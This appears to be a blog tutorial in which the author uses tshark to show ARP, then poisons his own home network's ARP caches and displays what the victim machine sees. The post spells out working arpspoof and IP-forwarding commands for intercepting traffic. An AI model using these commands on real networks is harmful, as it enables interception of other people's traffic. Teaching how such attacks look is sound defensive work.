Using tshark to find the man in the middle
This post is targeted at people that understand ip addresses, default gateways and have heard of arp, but don’t play with them often enough to realize how vulnerable we are to man in the middle attacks.
Back in the old days, the network hardware was often a hub, and hubs had a property that all the computers connected to a hub could see each others traffic. This meant if my computer and tori-the-lori were on the same hub tori-the-lori could see all my network traffic. This sound like weak security. In time the world invented switches, and now almost all networking uses switches. Switches differ from hubs in that computers only see traffic that is sent to them, not everyone's traffic. This difference should fix the weak security right? Well, as with most things security the devil is in the details. Lets dig in.
When a computer wants to talk another computer by IP address, it needs to find the MAC address for the IP address, this is done via ARP. Lets have a look at my home network.
Background info:
My machine is @ 192.168.1.101
Tori-The-Lori is another machine in my network @ 192.168.1.100
My default gateway is @ 192.168.1.1
C:\Users\igord>ipconfig | findstr 192.168.1.1 IPv4 Address. . . . . . . . . . . : 192.168.1.101 Default Gateway . . . . . . . . . : 192.168.1.1 C:\Users\igord>ping -4 tori-the-lori Pinging tori-the-lori [192.168.1.100] with 32 bytes of data:
Q: How does my machine know where to find 192.168.1.100?
A: 192.168.1.100 has a MAC address - MAC addresses are stored in the arp table, lets look at the ARP table:
PS C:\> arp -a | findstr 192.168.1.100 192.168.1.100 00-22-5f-7e-f5-79 dynamic
Q: Can I erase that entry from ARP table?
A: Yup
PS C:\> arp -d 192.168.1.100 PS C:\> arp -a | findstr 192.168.1.100
Q: If I delete the ARP entry how will my machine find 192.168.1.100 again?
A: Lets watch arp traffic in tshark :)
PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "arp" Capturing on Microsoft 7.202265 IntelCor_2f:5a:22 -> Broadcast ARP Who has 192.168.1.100? Tell 192.168.1.101 7.207136 LiteonTe_7e:f5:79 -> IntelCor_2f:5a:22 ARP 192.168.1.100 is at 00:22:5f:7e:f5:79
Q: How does my machine get a packet to bing?
A: My machine uses DNS to get the IP address, then my machine uses the default gateway (192.168.1.1) to send the packet to bing(69.31.112.153).
Pinging a134.g.akamai.net [69.31.112.153] with 32 bytes of data: Reply from 69.31.112.153: bytes=32 time=50ms TTL=54
Back in Wireshark:
PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp" -T fields -e eth.src -e eth.dst -e ip.src -e ip.dst Capturing on Microsoft 00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.153 00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.153 192.168.1.101
Notice the packet to and from bing's IP address is my default gateway:
PS C:\Program Files (x86)\Wireshark> arp -a | findstr 192.168.1.1 Interface: 192.168.1.101 --- 0xe 192.168.1.1 00-08-54-87-86-9c dynamic
Q: Can someone evil say they are 192.168.1.1?
A: Yup. I can transform my happy linux laptop, via these commands into an evil man in the middle:
#enable routing vmplanet@ubuntu-vm:~$ sudo sysctl -w net.ipv4.ip_forward=1 # tell 101 I’m really the default gateway. vmplanet@ubuntu-vm:~$ sudo arpspoof -t 192.168.1.101 192.168.1.1 > /dev/null #tell the default gateway I’m really 101. vmplanet@ubuntu-vm:~$ sudo arpspoof -t 192.168.1.1 192.168.1.101 > /dev/null
Q: What do I see on my windows box?
A: I wouldn’t be looking, but if you were you’d see this:
PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "arp or icmp" Capturing on Microsoft 0.697050 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22 1.997779 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host) 2.698765 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22 3.022153 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host) 3.584377 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host) 4.699856 IntelCor_2f:5a:22 -> IntelCor_2f:5a:22 ARP 192.168.1.1 is at 00:21:6a:2f:5a:22 4.765403 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host) 6.445970 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host) 6.555464 192.168.1.103 -> 192.168.1.1 ICMP Redirect (Redirect for host) 6.653009 192.168.1.103 -> 192.168.1.101 ICMP Redirect (Redirect for host)
Or maybe this:
PS C:\Program Files (x86)\Wireshark> arp -a | findstr 192.168.1.1 Interface: 192.168.1.101 --- 0xe 192.168.1.1 00-21-6a-2f-5a-22 dynamic 192.168.1.100 00-22-5f-7e-f5-79 dynamic 192.168.1.103 00-21-6a-2f-5a-22 dynamic
What the heck? 192.168.1.103 has now hijacked my ARP entry for the default gateway (compare to what 192.168.1.1 was above)
Unfortunately, when I ping bing.com things still look right:
Pinging a134.g.akamai.net [69.31.112.82] with 32 bytes of data: Reply from 69.31.112.82: bytes=32 time=37ms TTL=54 PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp" Capturing on Microsoft 5.758262 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request 5.794958 69.31.112.82 -> 192.168.1.101 ICMP Echo (ping) reply 6.760151 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request 11.304182 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request 16.304111 192.168.1.101 -> 69.31.112.82 ICMP Echo (ping) request
But when we look closely, like at the the MAC addresses – we realize all are packets go the man in the middle :(
PS C:\Program Files (x86)\Wireshark> .\tshark -i 4 -R "icmp" -T fields -e eth.src -e eth.dst -e ip.src -e ip.dst -e icmp Capturing on Microsoft 00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.106 icmp 00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.106 192.168.1.101 icmp 00:21:6a:2f:5a:22 00:08:54:87:86:9c 192.168.1.101 69.31.112.106 icmp 00:08:54:87:86:9c 00:21:6a:2f:5a:22 69.31.112.106 192.168.1.101 icmp 00:21:6a:2f:5a:22 00:21:6a:2f:5a:22 192.168.1.101 69.31.112.106 icmp
Now that I’ve shown you how easy it is to become a man in the middle you should be thinking about what you are doing so the man in the middle can’t see you.
Comments